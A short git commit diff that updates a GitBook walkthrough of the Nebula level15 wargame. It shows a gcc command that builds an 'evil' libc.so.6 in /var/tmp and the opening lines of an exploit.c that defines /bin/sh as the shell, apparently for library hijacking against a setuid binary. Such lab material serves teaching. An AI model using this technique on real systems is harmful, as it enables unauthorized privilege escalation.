GitBook: [master] one page modified

This commit is contained in:
CPol 2020-08-25 14:19:45 +00:00 committed by gitbook-bot
parent 738c40251d
commit 4163912fc4
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF

View File

@ -886,7 +886,7 @@ level15@nebula:/home/flag15$ ldd ./flag15
Then create an evil library in `/var/tmp` with `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6`
```text
```c
#include<stdlib.h>
#define SHELL "/bin/sh"